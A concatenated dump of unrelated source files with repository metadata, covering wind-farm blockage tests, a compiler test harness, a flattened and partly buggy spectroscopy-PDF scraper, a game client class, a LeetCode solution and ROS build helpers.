            exit(1)
    # Checking for sleep time (minutes -> seconds).
    if args.wait_time:
        # BUG FIX: args.wait_time is a string; convert before multiplying.
        wait_time = int(args.wait_time) * 60
    else:
        wait_time = 300
    log_file = "downloaded-{0}.txt".format(time.strftime('%d%m%Y_%H%M'))
    scanner.scan(args.keywords_file, output, log_file, quota_mb, wait_time)
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # Allow clean Ctrl-C shutdown without a traceback.
        pass
|
[
"raliclo@gmail.com"
] |
raliclo@gmail.com
|
|
c20ef58d20f34d8cb7e2c6df7c4607975c74d86e
|
2dadf0fb64c52655704d9231b8039fc0343c5e88
|
/py_wake/tests/test_blockage_models/test_selfsimilarity.py
|
f7695f796c9dfe4810417efb6ead3f6cf6b334b5
|
[
"MIT"
] |
permissive
|
luqidndx/PyWake
|
45377245e8d35db3c7b33b27ef11b812db0a6ada
|
3d046eb14c4597de49ac2fee3771b8e0e68820ad
|
refs/heads/master
| 2022-07-02T01:40:28.575907
| 2020-05-13T16:51:42
| 2020-05-13T16:51:42
| 259,701,236
| 0
| 0
|
MIT
| 2020-04-28T17:06:59
| 2020-04-28T17:06:58
| null |
UTF-8
|
Python
| false
| false
| 5,796
|
py
|
import pytest
import matplotlib.pyplot as plt
import numpy as np
from py_wake.deficit_models import SelfSimilarityDeficit
from py_wake.deficit_models.no_wake import NoWakeDeficit
from py_wake.deficit_models.noj import NOJDeficit
from py_wake.examples.data import hornsrev1
from py_wake.examples.data.hornsrev1 import Hornsrev1Site
from py_wake.superposition_models import LinearSum
from py_wake.tests import npt
from py_wake.wind_farm_models.engineering_models import All2AllIterative
@pytest.fixture(scope='module')
def setup():
    # Shared fixture: (site, turbine type, self-similarity blockage model),
    # built once per test module.
    site = Hornsrev1Site()
    windTurbines = hornsrev1.HornsrevV80()
    ss = SelfSimilarityDeficit()
    return site, windTurbines, ss
def test_selfsimilarity_reference_figures(setup):
    """Check the self-similarity deficit against the reference paper [1]:
    centerline decay (Fig. 11) and the radial similarity profile (Fig. 10)."""
    ss = setup[2]
    ws = 10
    D = 80
    R = D / 2
    WS_ilk = np.array([[[ws]]])
    D_src_il = np.array([[D]])
    ct_ilk = np.array([[[.8]]])
    # Centerline: upstream points along -x at zero crosswind distance.
    x1, y1 = -np.arange(200), np.array([0])
    deficit_centerline = ss.calc_deficit(WS_ilk=WS_ilk, D_src_il=D_src_il,
                                         dw_ijlk=x1.reshape((1, len(x1), 1, 1)),
                                         cw_ijlk=y1.reshape((1, len(y1), 1, 1)), ct_ilk=ct_ilk)[0, :, 0, 0]
    # Radial profile: fixed upstream distance -2R, sweep crosswind distance.
    x2, y2 = np.array([-2 * R]), np.arange(200)
    deficit_radial = ss.calc_deficit(WS_ilk=WS_ilk, D_src_il=D_src_il,
                                     dw_ijlk=x2.reshape((1, len(x2), 1, 1)),
                                     cw_ijlk=y2.reshape((1, len(y2), 1, 1)), ct_ilk=ct_ilk)[0, :, 0, 0]
    r12 = np.sqrt(ss.lambda_ * (ss.eta + (x2 / R) ** 2))  # Eq. (13) from [1]
    if 0:
        # Debug plotting branch (disabled).
        plt.title('Fig 11 from [1]')
        plt.xlabel('x/R')
        plt.ylabel('a')
        plt.plot(x1 / R, deficit_centerline / ws)
        print(list(np.round(deficit_centerline[::20], 6)))
        plt.figure()
        plt.title('Fig 10 from [1]')
        print(list(np.round(deficit_radial[::20] / deficit_radial[0], 6)))
        plt.xlabel('y/R12 (epsilon)')
        plt.ylabel('f')
        plt.plot((y2 / R) / r12, deficit_radial / deficit_radial[0])
        plt.show()
    # Digitized reference points from the paper's figures.
    fig11_ref = np.array([[-0.025, -1, -2, -3, -4, -5], [0.318, 0.096, 0.035, 0.017, 0.010, 0.0071]]).T
    npt.assert_array_almost_equal(np.interp(-fig11_ref[:, 0], -x1 / R, deficit_centerline / ws), fig11_ref[:, 1], 1)
    npt.assert_array_almost_equal(deficit_centerline[::20], [0, 1.806478, 0.95716, 0.548851, 0.345007,
                                                             0.233735, 0.1677, 0.125738, 0.097573, 0.077819])
    fig10_ref = np.array([[0, 1, 2, 3], [1, .5, .15, .045]]).T
    npt.assert_array_almost_equal(np.interp(fig10_ref[:, 0], (y2 / R) / r12, deficit_radial / deficit_radial[0]),
                                  fig10_ref[:, 1], 1)
    npt.assert_array_almost_equal(deficit_radial[::20] / deficit_radial[0],
                                  [1.0, 0.933011, 0.772123, 0.589765, 0.430823, 0.307779,
                                   0.217575, 0.153065, 0.107446, 0.075348])
def test_blockage_map(setup):
    """Flow map of one turbine with blockage only (no wake deficit): the
    induction slow-down field must match the stored reference rows."""
    site, windTurbines, ss = setup
    wm = All2AllIterative(site, windTurbines, wake_deficitModel=NoWakeDeficit(),
                          superpositionModel=LinearSum(), blockage_deficitModel=ss)
    flow_map = wm(x=[0], y=[0], wd=[270], ws=[10]).flow_map()
    X_j, Y_j = flow_map.XY
    WS_eff = flow_map.WS_eff_xylk[:, :, 0, 0]
    if 0:
        # Debug plotting branch (disabled).
        plt.contourf(X_j, Y_j, WS_eff)
        plt.plot(X_j[200, ::50], Y_j[200, ::50], '.-')
        plt.plot(X_j[250, ::50], Y_j[250, ::50], '.-')
        print(list(np.round(WS_eff[200, ::50], 6)))
        print(list(np.round(WS_eff[250, ::50], 6)))
        ss.windTurbines.plot([0], [0], wd=[270])
        plt.show()
    npt.assert_array_almost_equal(WS_eff[200, ::50], [9.940967, 9.911659, 9.855934,
                                                      9.736016, 9.44199, 10.0, 10.0, 10.0, 10.0, 10.0])
    npt.assert_array_almost_equal(WS_eff[250, ::50], [9.937601, 9.90397, 9.834701,
                                                      9.659045, 9.049764, 10.0, 10.0, 10.0, 10.0, 10.0])
def test_wake_and_blockage(setup):
    """Combined NOJ wake plus self-similarity blockage: upstream rows show
    the blockage slow-down, downstream rows the wake deficit."""
    site, windTurbines, ss = setup
    noj_ss = All2AllIterative(site, windTurbines, wake_deficitModel=NOJDeficit(),
                              blockage_deficitModel=ss, superpositionModel=LinearSum())
    flow_map = noj_ss(x=[0], y=[0], wd=[270], ws=[10]).flow_map()
    X_j, Y_j = flow_map.XY
    WS_eff = flow_map.WS_eff_xylk[:, :, 0, 0]
    npt.assert_array_almost_equal(WS_eff[200, ::50], [9.940967, 9.911659, 9.855934, 9.736016, 9.44199, 4.560631,
                                                      5.505472, 6.223921, 6.782925, 7.226399])
    npt.assert_array_almost_equal(WS_eff[250, ::50], [9.937601, 9.90397, 9.834701, 9.659045, 9.049764, 4.560631,
                                                      5.505472, 6.223921, 6.782925, 7.226399])
    if 0:
        # Debug plotting branch (disabled).
        plt.contourf(X_j, Y_j, WS_eff)
        plt.plot(X_j[200, ::50], Y_j[200, ::50], '.-')
        plt.plot(X_j[250, ::50], Y_j[250, ::50], '.-')
        print(list(np.round(WS_eff[200, ::50], 6)))
        print(list(np.round(WS_eff[250, ::50], 6)))
        ss.windTurbines.plot([0], [0], wd=[270])
        plt.show()
def test_aep_two_turbines(setup):
    """AEP of two turbines 3D apart: blockage alone (no wake) must reduce the
    wd=270 sector AEP by ~0.49% relative to the no-loss computation."""
    site, windTurbines, ss = setup
    nwm_ss = All2AllIterative(site, windTurbines, wake_deficitModel=NoWakeDeficit(),
                              blockage_deficitModel=ss, superpositionModel=LinearSum())
    sim_res = nwm_ss(x=[0, 80 * 3], y=[0, 0])
    aep_no_blockage = sim_res.aep_ilk(with_wake_loss=False).sum(2)
    aep = sim_res.aep_ilk().sum(2)
    # blockage reduce aep(wd=270) by .5%
    npt.assert_almost_equal((aep_no_blockage[0, 270] - aep[0, 270]) / aep_no_blockage[0, 270] * 100, 0.4896853)
    if 0:
        plt.plot(sim_res.WS_eff_ilk[:, :, 7].T)
        plt.show()
|
[
"mmpe@dtu.dk"
] |
mmpe@dtu.dk
|
fedd53070c0b4a1d64e61591d4c69662132cb765
|
7b55cfc4ffa7678e4c7b8f2312831ebbd549e54f
|
/proj1/tests/other-tests/oskis-angels_tests/regexperts_tests/test-proj1
|
afb5b61b6d7e62ec1bf967ca1639a3a68c36a002
|
[] |
no_license
|
czchen1/cs164-projects
|
0d330efef85421e611a436b165428ba0ddfb3512
|
a04cafbcaafd32e518227dacf89a6d7837bf9f57
|
refs/heads/master
| 2020-03-27T04:03:31.727524
| 2018-08-23T21:43:46
| 2018-08-23T21:43:46
| 145,909,148
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,436
|
#!/usr/bin/env python3
# Test compiler against suite of Python programs. Requires that pyunparse be
# on the path.
import os, sys, re
from subprocess import Popen, PIPE
from getopt import getopt, GetoptError
def Usage():
    # Print the command-line help text (verbatim triple-quoted) to stderr.
    print('''
Usage: test-proj1 [ --errors ] [ --compiler=COMPILER ] [ --retain ] \
            [ --runtime=RUNTIME.py ] DIR/BASE.py ...
   Runs COMPILER (default ./apyc) on each DIR/BASE.py with the command
        COMPILER --phase=1 -o BASE.ast PROGRAM-FILE
   In the absence of the --errors option, unparses the result into
   a Python program BASE-2.py.  If there is a file BASE.pre, prefixes that
   to BASE-2.py; otherwise, if there is a file RUNTIME.py specified,
   prefixes that.  Then runs python on BASE-2.py.
   If there is a file DIR/BASE.in, uses that as the standard input.
   Otherwise, uses the empty file for the standard input.  Compares
   the output to file DIR/BASE.std, if that is present, and otherwise
   just checks that the python interpreter exits normally.  Retains ASTs
   if --retain.

   With the --errors option, checks that the compiler exits with a
   non-zero exit code and that stderr contains at least one error message
   in the correct format.  Does not unparse the resulting AST or execute
   the Python interpreter.

   Reports results and exits with 0 if there are no errors, and
   with 1 otherwise.''', file=sys.stderr)
def Run(command, *args, **keys):
    """Run *command* (a %-format template filled with *args*) in a shell.

    Returns (returncode, stdout, stderr) with both streams decoded as UTF-8.
    The optional keyword 'stdin' supplies data for the child's standard input.
    """
    if args:
        command = command % args
    proc = Popen(command, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
    stdin_data = keys.get('stdin', '')
    out, err = proc.communicate(stdin_data)
    return proc.returncode, out.decode('utf-8'), err.decode('utf-8')
def Remove(file):
    """Delete *file*, silently ignoring a missing file."""
    try:
        os.remove(file)
    except OSError:
        pass
def Contents(file):
    """Return the full text of *file*, or "" if it cannot be read.

    Unreadable, missing, or undecodable files are treated as empty so that
    optional fixture files (.in/.std/.pre) need not exist.  The original
    bare ``except:`` also hid unrelated bugs, so the handler is narrowed.
    """
    try:
        with open(file) as f:
            return f.read()
    except (OSError, UnicodeDecodeError):
        return ""
def Compile(prog, ast):
    """Run the compiler under test in phase 1 on *prog*, emitting *ast*.

    Captures the compiler's stdout/stderr into the module globals
    Stdout/Stderr.  Returns True iff the compiler exited with status 0.
    """
    global Stdout, Stderr
    status, Stdout, Stderr = Run("%s --phase=1 -o %s %s", compiler, ast, prog)
    return status == 0
def Unparse(ast, python, prefix=""):
code, out, err = Run("pyunparse --remove-extensions %s", ast)
if code != 0:
return False
outfile = open(python, "w")
outfile.write(prefix + out)
outfile.close()
return True
def Execute(prog, inp):
    """Run the python interpreter on *prog*, feeding it *inp* on stdin.

    Captures interpreter output in the globals Stdout/Stderr and returns
    True iff the interpreter exited with status 0.
    """
    global Stdout, Stderr
    status, Stdout, Stderr = Run("python %s", prog, stdin=inp.encode('utf-8'))
    return status == 0
def HasError(errout):
    """Return a truthy match if *errout* contains an apyc-style error line.

    The expected shape is ``FILE.py:LINE: message`` at the start of a line.
    """
    error_line = re.compile(r'(?m)^[^:]+\.py:\d+:\s*\S')
    return error_line.search(errout)
# ---- Command-line processing ----
try:
    opts, tests = getopt (sys.argv[1:], 'h',
                          ['help', 'retain', 'errors', 'runtime=', 'compiler='])
except GetoptError:
    Usage()
    sys.exit(1)
# Option defaults.
compiler = './apyc'   # compiler executable under test (--compiler)
errors = False        # --errors: expect compilation to fail with a message
retain = False        # --retain: keep generated .ast files afterwards
runtime = ''          # --runtime: default prefix for unparsed programs
for opt, val in opts:
    if opt in ( '-h', '--help' ):
        Usage()
        sys.exit(0)
    elif opt == '--errors':
        errors = True
    elif opt == '--compiler':
        compiler = val
    elif opt == '--retain':
        retain = True
    elif opt == '--runtime':
        runtime = Contents(val)
# ---- Test loop: one iteration per DIR/BASE.py on the command line ----
N = 0    # number of tests run
OK = 0   # number of tests passed
for f in tests:
    N += 1
    dir, file = os.path.split(f)
    base, ext = os.path.splitext(file)
    print(base + ".py:", end=" ")
    ast = base + ".ast"
    if errors:
        # Error test: the compile must FAIL and stderr must carry at least
        # one well-formed "FILE.py:LINE: msg" diagnostic.
        if Compile(f, ast):
            msg = "FAIL (wrong exit code)"
        elif HasError (Stderr):
            msg = "OK"
        else:
            msg = "FAIL (bad error message)"
    else:
        # Normal test: compile, unparse to BASE-2.py, execute, and compare
        # the program's output against BASE.std (when present).
        prog2 = base + "-2.py"
        inp = os.path.join(dir, base + ".in")
        std = Contents (os.path.join(dir, base + ".std"))
        # BASE.pre overrides the --runtime prefix when it exists.
        prefix = Contents(os.path.join(dir, base + ".pre")) or runtime
        if not Compile(f, ast):
            msg = "FAIL (wrong exit code)"
        elif Stderr:
            msg = "FAIL (error messages)"
        elif not Unparse(ast, prog2, prefix):
            msg = "FAIL (bad AST)"
        elif not Execute(prog2, Contents(inp)):
            msg = "FAIL (execution error)"
        elif Stderr:
            msg = "FAIL (error output on execution)"
        elif std and std != Stdout:
            msg = "FAIL (wrong output)"
        else:
            msg = "OK"
        Remove(prog2)
    if not retain:
        Remove(ast)
    if msg == "OK":
        OK += 1
    print(msg)
# ---- Summary: exit 0 iff every test passed ----
print()
print("Ran %d tests." % N)
if OK == N:
    print("All passed.")
    sys.exit(0)
else:
    print("%d failed." % (N - OK))
    sys.exit(1)
|
[
"czchen@mit.edu"
] |
czchen@mit.edu
|
|
e7e0c38178d388d789d1caec87893f7825006c74
|
3d19e1a316de4d6d96471c64332fff7acfaf1308
|
/Users/L/lk_morgan/molecular_spectroscopy_data_3.py
|
e22a7abf2fdbca5d126d00da9a5629182b65adc7
|
[] |
no_license
|
BerilBBJ/scraperwiki-scraper-vault
|
4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc
|
65ea6a943cc348a9caf3782b900b36446f7e137d
|
refs/heads/master
| 2021-12-02T23:55:58.481210
| 2013-09-30T17:02:59
| 2013-09-30T17:02:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,992
|
py
|
###########################################################################################
# We use a ScraperWiki library called pdftoxml to scrape PDFs.
# This is an example of scraping a simple PDF.
###########################################################################################
import scraperwiki
import urllib2
import lxml.etree
import lxml.html
import re
htmlurl=scraperwiki.scrape("http://spec.jpl.nasa.gov/ftp/pub/catalog/catdir.html")
html = lxml.html.fromstring(htmlurl)
text_arr=[]
for el in html.cssselect("div[align='left'] a"):
text=el.text_content()
text_arr.append(text)
cat_list=[]
for k in text_arr:
if k != 'pdf' and k !='Tex': cat_list.append(k)
species_list=[]
for l in cat_list:
start = l.find('c')
end = l.find('.cat', start)
species_list.append(l[start+1:end])
for i in species_list:
#Skip the 055002 and 102002 files for now as they don't follow the regular format, need to fix this at some point
if i !='055002' and i !='102002':
print i
sp_url="http://spec.jpl.nasa.gov/ftp/pub/catalog/doc/d"+i+".pdf"
url = sp_url
pdfdata = urllib2.urlopen(url).read()
xmldata = scraperwiki.pdftoxml(pdfdata,'-hidden')
root = lxml.etree.fromstring(xmldata)
pages = list(root)
# this function has to work recursively because we might have "<b>Part1 <i>part 2</i></b>"
def gettext_with_bi_tags(el):
    """Recursively flatten element *el* to text, re-inserting <tag>...</tag>
    markers for nested elements (handles e.g. "<b>Part1 <i>part 2</i></b>").

    Note: a child's tail text is emitted inside that child's closing tag,
    matching the original behavior exactly.
    """
    pieces = []
    if el.text:
        pieces.append(el.text)
    for child in el:
        pieces.append("<%s>" % child.tag)
        pieces.append(gettext_with_bi_tags(child))
        pieces.append("</%s>" % child.tag)
    if el.tail:
        pieces.append(el.tail)
    return "".join(pieces)
print gettext_with_bi_tags(pages[0])
row=[]
pagei=0
for page in list(pages):
pagei=pagei+1
eli=0
for el in list(page):
eli=eli+1
row.append(gettext_with_bi_tags(el))
try:
Species_Tagn=row.index('Species Tag:')
Species=row[Species_Tagn+1]
except:
Species='No Info'
try:
Namen = row.index('Name:')
if row[Namen+1] == row[Versionn-1]:Name=row[Namen+1]
else:Name=row[Namen+1]+row[Versionn-1]
except:
Name='No Info'
Versionn=row.index('Version:')
Daten=row.index('Date:')
Q300n=row.index('Q(300.0)=')
Q225n=row.index('Q(225.0)=')
Q150n=row.index('Q(150.0)=')
Q75n=row.index('Q(75.00)=')
Q37n=row.index('Q(37.50)=')
Q18n=row.index('Q(18.75)=')
Q9n=row.index('Q(9.375)=')
try:
mu_an=row.index('a')
except:
mu_an=row.index('0')
try:
mu_bn=row.index('b')
except:
mu_bn=row.index(u'\xb5 =')
try:
mu_cn=row.index('c')
except:
mu_cn=row.index('el')
maxJn=row.index('Max. J:')
An=row.index('A=')
Bn=row.index('B=')
Cn=row.index('C=')
State=row[Versionn+2:Daten]
statn=''
for j in State:
statn=statn+' '+j
if row[An+1] == u'\xb5' or row[An+1] == u'\xb5 =':A='no data'
else: A=row[An+1]
if row[Bn+1] == u'\xb5':B='no data'
else: B=row[Bn+1]
C_test=row[Cn+1]
if C_test != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':C='no data'
else:C=row[Cn+1]
if row[mu_an+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':mua='no data'
else: mua=row[mu_an+2]
if row[mu_bn+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':mub='no data'
else: mub=row[mu_cn+2]
if row[mu_cn+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':muc='no data'
else: muc=row[mu_cn+2]
scraperwiki.sqlite.save(unique_keys=["Species Tag"],data={"Molecule":Name,"State":statn,"Species Tag":Species,"Max J":row[maxJn+1],"mu a":mua,"mu b":mub,"mu c":muc,"A":A,"B":B,"C":C,"Q300":row[Q300n+1],"Q225":row[Q225n+1],"Q150":row[Q150n+1],"Q75":row[Q75n+1],"Q37":row[Q37n+1],"Q18":row[Q18n+1],"Q9":row[Q9n+1]})
###########################################################################################
# We use a ScraperWiki library called pdftoxml to scrape PDFs.
# This is an example of scraping a simple PDF.
###########################################################################################
import scraperwiki
import urllib2
import lxml.etree
import lxml.html
import re
htmlurl=scraperwiki.scrape("http://spec.jpl.nasa.gov/ftp/pub/catalog/catdir.html")
html = lxml.html.fromstring(htmlurl)
text_arr=[]
for el in html.cssselect("div[align='left'] a"):
text=el.text_content()
text_arr.append(text)
cat_list=[]
for k in text_arr:
if k != 'pdf' and k !='Tex': cat_list.append(k)
species_list=[]
for l in cat_list:
start = l.find('c')
end = l.find('.cat', start)
species_list.append(l[start+1:end])
for i in species_list:
#Skip the 055002 and 102002 files for now as they don't follow the regular format, need to fix this at some point
if i !='055002' and i !='102002':
print i
sp_url="http://spec.jpl.nasa.gov/ftp/pub/catalog/doc/d"+i+".pdf"
url = sp_url
pdfdata = urllib2.urlopen(url).read()
xmldata = scraperwiki.pdftoxml(pdfdata,'-hidden')
root = lxml.etree.fromstring(xmldata)
pages = list(root)
# this function has to work recursively because we might have "<b>Part1 <i>part 2</i></b>"
def gettext_with_bi_tags(el):
    """Recursively flatten element *el* to text, re-inserting <tag>...</tag>
    markers for nested elements (handles e.g. "<b>Part1 <i>part 2</i></b>").

    Note: a child's tail text is emitted inside that child's closing tag,
    matching the original behavior exactly.
    """
    pieces = []
    if el.text:
        pieces.append(el.text)
    for child in el:
        pieces.append("<%s>" % child.tag)
        pieces.append(gettext_with_bi_tags(child))
        pieces.append("</%s>" % child.tag)
    if el.tail:
        pieces.append(el.tail)
    return "".join(pieces)
print gettext_with_bi_tags(pages[0])
row=[]
pagei=0
for page in list(pages):
pagei=pagei+1
eli=0
for el in list(page):
eli=eli+1
row.append(gettext_with_bi_tags(el))
try:
Species_Tagn=row.index('Species Tag:')
Species=row[Species_Tagn+1]
except:
Species='No Info'
try:
Namen = row.index('Name:')
if row[Namen+1] == row[Versionn-1]:Name=row[Namen+1]
else:Name=row[Namen+1]+row[Versionn-1]
except:
Name='No Info'
Versionn=row.index('Version:')
Daten=row.index('Date:')
Q300n=row.index('Q(300.0)=')
Q225n=row.index('Q(225.0)=')
Q150n=row.index('Q(150.0)=')
Q75n=row.index('Q(75.00)=')
Q37n=row.index('Q(37.50)=')
Q18n=row.index('Q(18.75)=')
Q9n=row.index('Q(9.375)=')
try:
mu_an=row.index('a')
except:
mu_an=row.index('0')
try:
mu_bn=row.index('b')
except:
mu_bn=row.index(u'\xb5 =')
try:
mu_cn=row.index('c')
except:
mu_cn=row.index('el')
maxJn=row.index('Max. J:')
An=row.index('A=')
Bn=row.index('B=')
Cn=row.index('C=')
State=row[Versionn+2:Daten]
statn=''
for j in State:
statn=statn+' '+j
if row[An+1] == u'\xb5' or row[An+1] == u'\xb5 =':A='no data'
else: A=row[An+1]
if row[Bn+1] == u'\xb5':B='no data'
else: B=row[Bn+1]
C_test=row[Cn+1]
if C_test != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':C='no data'
else:C=row[Cn+1]
if row[mu_an+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':mua='no data'
else: mua=row[mu_an+2]
if row[mu_bn+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':mub='no data'
else: mub=row[mu_cn+2]
if row[mu_cn+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':muc='no data'
else: muc=row[mu_cn+2]
scraperwiki.sqlite.save(unique_keys=["Species Tag"],data={"Molecule":Name,"State":statn,"Species Tag":Species,"Max J":row[maxJn+1],"mu a":mua,"mu b":mub,"mu c":muc,"A":A,"B":B,"C":C,"Q300":row[Q300n+1],"Q225":row[Q225n+1],"Q150":row[Q150n+1],"Q75":row[Q75n+1],"Q37":row[Q37n+1],"Q18":row[Q18n+1],"Q9":row[Q9n+1]})
|
[
"pallih@kaninka.net"
] |
pallih@kaninka.net
|
061e7dda33dcb2c2fb0db6cad3aee933e290bf59
|
b1bc2e54f8cd35c9abb6fc4adb35b386c12fe6b4
|
/toontown/src/coghq/LobbyManager.py
|
a7cc7848ebf5356ae4059739f695cbf473e47cec
|
[] |
no_license
|
satire6/Anesidora
|
da3a44e2a49b85252b87b612b435fb4970469583
|
0e7bfc1fe29fd595df0b982e40f94c30befb1ec7
|
refs/heads/master
| 2022-12-16T20:05:13.167119
| 2020-09-11T16:58:04
| 2020-09-11T17:02:06
| 294,751,966
| 89
| 32
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 850
|
py
|
from pandac.PandaModules import *
from toontown.toonbase import ToontownGlobals
from direct.distributed import DistributedObject
from direct.directnotify import DirectNotifyGlobal
from toontown.toonbase import TTLocalizer
class LobbyManager(DistributedObject.DistributedObject):
    """Client-side distributed object for a Cog HQ lobby."""
    notify = DirectNotifyGlobal.directNotify.newCategory("LobbyManager")
    # Message name used for factory-zone assignment events.
    SetFactoryZoneMsg = "setFactoryZone"
    def __init__(self, cr):
        """cr: the client repository this distributed object belongs to."""
        DistributedObject.DistributedObject.__init__(self, cr)
    def generate(self):
        """Log and delegate to the base class when the object is generated."""
        self.notify.debug("generate")
        DistributedObject.DistributedObject.generate(self)
    def disable(self):
        """Drop all event hooks, then delegate disabling to the base class."""
        self.notify.debug("disable")
        self.ignoreAll()
        DistributedObject.DistributedObject.disable(self)
    def getSuitDoorOrigin(self):
        # NOTE(review): fixed door-origin index; presumably matched by the
        # building/door code -- confirm against callers.
        return 1
    def getBossLevel(self):
        # The lobby manager always reports boss level 0.
        return 0
|
[
"66761962+satire6@users.noreply.github.com"
] |
66761962+satire6@users.noreply.github.com
|
bf4dfb85175642bde5e44e837f015463e1b8fed7
|
036a41c913b3a4e7ae265e22a672dd89302d3200
|
/1201-1300/1237/1237_Python_1.py
|
7e07569009a051950622f77e1c5934eb19a13fe8
|
[] |
no_license
|
ChangxingJiang/LeetCode
|
e76f96ebda68d7ade53575354479cfc33ad4f627
|
a2209206cdd7229dd33e416f611e71a984a8dd9e
|
refs/heads/master
| 2023-04-13T15:23:35.174390
| 2021-04-24T05:54:14
| 2021-04-24T05:54:14
| 272,088,506
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,021
|
py
|
from typing import List
class CustomFunction:
    """Stand-in for LeetCode's hidden function: f(x, y) = x + y."""

    def f(self, x, y):
        # Strictly increasing in both arguments, as the problem guarantees.
        return y + x
class Solution:
    def findSolution(self, customfunction: 'CustomFunction', z: int) -> List[List[int]]:
        """Return all pairs [x, y] with 1 <= x, y <= 1000 and f(x, y) == z.

        Walks x upward and y downward.  When f is clearly too small (or too
        large), a midpoint probe lets x jump forward (or y jump backward)
        instead of stepping one at a time.  Pairs come out in increasing x.
        """
        x, y = 1, 1000
        pairs = []
        while x <= 1000 and y >= 1:
            if customfunction.f(x, y) < z:
                # Too small: jump x to the midpoint if that still
                # undershoots, otherwise advance by one.
                probe = (x + y) // 2
                x = max(probe, x + 1) if customfunction.f(probe, y) < z else x + 1
            elif customfunction.f(x, y) > z:
                # Too large: symmetric midpoint jump / single step for y.
                probe = (x + y) // 2
                y = min(probe, y - 1) if customfunction.f(x, probe) > z else y - 1
            else:
                pairs.append([x, y])
                x += 1
                y -= 1
        return pairs
if __name__ == "__main__":
    # Manual smoke check against the sample case from the problem statement.
    print(Solution().findSolution(CustomFunction(), 5))  # [[1,4],[2,3],[3,2],[4,1]]
|
[
"1278729001@qq.com"
] |
1278729001@qq.com
|
b35153d84b3d5de30ced8c149b72bb65a1168607
|
1ba5c90292dbed982a23167fd083dd2cf29f6d8d
|
/bin/boliau-filter
|
5a2dda5ecd69ac3fffc88b2999546c11e061382c
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
hychen/boliau
|
8d99a331056ef18001cae5503084624c1e43618c
|
618e4557c7b4a3d97c9926b1d7e691291472ff7c
|
refs/heads/master
| 2021-01-01T17:37:25.012545
| 2013-08-16T09:58:58
| 2013-08-16T09:58:58
| 7,454,169
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,269
|
#!/usr/bin/env python
# -*- coding: utf-8 -*
#
# File: boliau-filter
#
# Copyright (C) 2012 Hsin-Yi Chen (hychen)
# Author(s): Hsin-Yi Chen (hychen) <ossug.hychen@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from boliau import cmd
cmd.do_filter()
|
[
"ossug.hychen@gmail.com"
] |
ossug.hychen@gmail.com
|
|
338ab5824090a54458b92bcebc0868ff7bbea5b4
|
61eec9771de17885af1f817ddf7df8eaa1fdd168
|
/build/robmovil_msgs/catkin_generated/generate_cached_setup.py
|
116ed7667ac27a834209aaf5ce7318f3a3bf28e8
|
[] |
no_license
|
jrr1984/TP_FINAL_ROBOTICA
|
c1ce681b5ea4ca4fea7bfcde00fb289dc81842df
|
46988eccec3d8e11f56a6e6e43315d446ded12e7
|
refs/heads/master
| 2020-03-28T21:26:39.339951
| 2018-09-17T16:42:14
| 2018-09-17T16:42:14
| 149,156,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,331
|
py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/kinetic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/kinetic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/opt/ros/kinetic;/home/jrr/catkin_ws/devel".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/jrr/catkin_ws/devel/.private/robmovil_msgs/env.sh')
output_filename = '/home/jrr/catkin_ws/build/robmovil_msgs/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
|
[
"juanreto@gmail.com"
] |
juanreto@gmail.com
|
fc075357702383e855d1b916cb2ef66b92f99214
|
7fdac5209f86de756b9a8123a0911b70738eceeb
|
/pySDC/tests/test_tutorials/test_step_1.py
|
50d02c63344d3cb3b66cf680ff3d9c731d6e2d36
|
[
"BSD-2-Clause"
] |
permissive
|
Parallel-in-Time/pySDC
|
